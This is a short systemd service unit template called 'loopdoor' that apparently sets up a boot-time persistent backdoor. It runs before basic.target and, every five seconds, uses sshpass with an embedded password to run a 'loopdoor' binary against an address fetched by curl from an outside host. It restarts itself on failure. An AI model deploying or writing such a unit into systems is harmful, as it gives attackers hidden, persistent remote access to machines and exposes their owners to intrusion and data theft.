[Unit]
Description=loopdoor
Before=basic.target
After=local-fs.target sysinit.target
DefaultDependencies=no

[Service]
Type=simple
User={USER}
ExecStart=/bin/bash -c "while sleep 5; do sshpass -p {PASSWORD} loopdoor $(curl -s {LOCATION}.ipqueue.com); done"
Restart=on-failure

[Install]
WantedBy=basic.target
